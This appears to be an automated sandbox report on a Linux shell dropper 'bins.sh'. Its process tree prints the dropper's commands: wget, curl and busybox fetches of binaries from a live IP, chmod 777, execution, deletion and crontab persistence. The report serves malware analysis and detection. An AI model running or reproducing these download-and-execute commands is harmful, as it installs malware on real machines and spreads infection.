Malware Analysis Report

2024-11-15 08:23

Sample ID 241028-cazahsyalj
Target bins.sh
SHA256 5858f0fb88e8a5b65501e654868ef90ac09e709484454d0ff8c8de09119c91a2
Tags
defense_evasion discovery execution persistence privilege_escalatio antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

5858f0fb88e8a5b65501e654868ef90ac09e709484454d0ff8c8de09119c91a2

Threat Level: Shows suspicious behavior

The file bins.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery execution persistence privilege_escalatio antivm

Executes dropped EXE

Renames itself

File and Directory Permissions Modification

Creates/modifies Cron job

Enumerates running processes

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-28 01:53

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-28 01:53

Reported

2024-10-28 01:55

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

149s

Max time network

150s

Command Line

[/tmp/bins.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
N/A /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
N/A /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i N/A
N/A /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F N/A
N/A /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E N/A
N/A /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
N/A /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby N/A
N/A /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA N/A
N/A /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D N/A
N/A /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif N/A
N/A /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
N/A /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe N/A
N/A /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK N/A
N/A /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 N/A
N/A /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i N/A
N/A /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F N/A
N/A /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E N/A
N/A /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
N/A /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby N/A
N/A /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA N/A
N/A /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D N/A
N/A /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif N/A
N/A /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
N/A /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe N/A
N/A /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK N/A
N/A /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 N/A
N/A /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
N/A /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.dCb0gu /usr/bin/crontab N/A

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/1186/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1486/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1512/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/28/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/169/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/606/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/948/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1281/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/81/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/668/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1532/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1642/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/438/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/966/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1508/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1183/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/115/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/168/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/465/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/79/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1553/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1552/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1105/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1141/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1157/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/727/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1520/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1231/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1519/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1629/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/15/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/715/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1227/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1168/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1588/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1601/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/80/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/161/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1146/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1123/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/82/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/84/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/175/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/3/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1029/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/27/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1531/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1312/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1699/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/17/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/165/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1115/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1510/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1671/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/581/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1150/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1546/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1164/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1336/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1373/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/1077/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/2/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/686/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
File opened for reading /proc/949/cmdline /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /bin/busybox N/A
File opened for modification /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /usr/bin/wget N/A
File opened for modification /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /bin/busybox N/A
File opened for modification /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /usr/bin/curl N/A
File opened for modification /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /usr/bin/wget N/A
File opened for modification /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /usr/bin/wget N/A
File opened for modification /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /usr/bin/curl N/A
File opened for modification /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /usr/bin/curl N/A
File opened for modification /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /usr/bin/curl N/A
File opened for modification /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /usr/bin/wget N/A
File opened for modification /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /usr/bin/wget N/A
File opened for modification /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /bin/busybox N/A
File opened for modification /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /usr/bin/curl N/A
File opened for modification /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /bin/busybox N/A
File opened for modification /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /usr/bin/curl N/A
File opened for modification /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /bin/busybox N/A
File opened for modification /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /usr/bin/curl N/A
File opened for modification /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /usr/bin/curl N/A
File opened for modification /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /usr/bin/curl N/A
File opened for modification /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /bin/busybox N/A
File opened for modification /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /bin/busybox N/A
File opened for modification /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /usr/bin/wget N/A
File opened for modification /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /usr/bin/wget N/A
File opened for modification /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /bin/busybox N/A
File opened for modification /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /bin/busybox N/A
File opened for modification /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /usr/bin/curl N/A
File opened for modification /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /bin/busybox N/A
File opened for modification /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /usr/bin/wget N/A
File opened for modification /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /usr/bin/wget N/A
File opened for modification /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /usr/bin/wget N/A
File opened for modification /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /usr/bin/wget N/A
File opened for modification /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /bin/busybox N/A
File opened for modification /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /usr/bin/wget N/A
File opened for modification /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /usr/bin/curl N/A
File opened for modification /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /usr/bin/curl N/A
File opened for modification /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /bin/busybox N/A
File opened for modification /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /usr/bin/curl N/A
File opened for modification /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /bin/busybox N/A
File opened for modification /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /bin/busybox N/A
File opened for modification /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /usr/bin/curl N/A
File opened for modification /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /usr/bin/wget N/A
File opened for modification /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /usr/bin/wget N/A
File opened for modification /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /usr/bin/wget N/A
File opened for modification /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /usr/bin/curl N/A
File opened for modification /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /usr/bin/curl N/A
File opened for modification /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /usr/bin/curl N/A
File opened for modification /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /bin/busybox N/A
File opened for modification /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /bin/busybox N/A
File opened for modification /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /usr/bin/curl N/A
File opened for modification /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /bin/busybox N/A
File opened for modification /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /usr/bin/wget N/A
File opened for modification /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /usr/bin/curl N/A
File opened for modification /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /bin/busybox N/A
File opened for modification /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /usr/bin/wget N/A
File opened for modification /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /usr/bin/curl N/A
File opened for modification /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /bin/busybox N/A
File opened for modification /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /usr/bin/curl N/A
File opened for modification /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /bin/busybox N/A
File opened for modification /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /bin/busybox N/A
File opened for modification /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /bin/busybox N/A
File opened for modification /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /usr/bin/curl N/A
File opened for modification /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /usr/bin/wget N/A
File opened for modification /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /bin/busybox N/A
File opened for modification /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /bin/busybox N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/chmod

[chmod 777 b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

[./b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/sh

[sh -c crontab -l]

/usr/bin/crontab

[crontab -l]

/bin/sh

[sh -c crontab -]

/usr/bin/crontab

[crontab -]

/bin/rm

[rm b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/wget

[wget http://87.120.126.196/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/chmod

[chmod 777 V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj

[./V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/rm

[rm V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/wget

[wget http://87.120.126.196/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/chmod

[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i

[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/rm

[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/wget

[wget http://87.120.126.196/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/chmod

[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F

[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/rm

[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/wget

[wget http://87.120.126.196/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/chmod

[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E

[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/rm

[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/wget

[wget http://87.120.126.196/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/chmod

[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV

[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/rm

[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/wget

[wget http://87.120.126.196/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/chmod

[chmod 777 NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby

[./NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/rm

[rm NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/wget

[wget http://87.120.126.196/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/chmod

[chmod 777 LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA

[./LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/rm

[rm LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/wget

[wget http://87.120.126.196/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/chmod

[chmod 777 yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D

[./yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/rm

[rm yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/wget

[wget http://87.120.126.196/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/chmod

[chmod 777 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif

[./5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/rm

[rm 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/wget

[wget http://87.120.126.196/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/chmod

[chmod 777 GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb

[./GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/rm

[rm GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/wget

[wget http://87.120.126.196/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/chmod

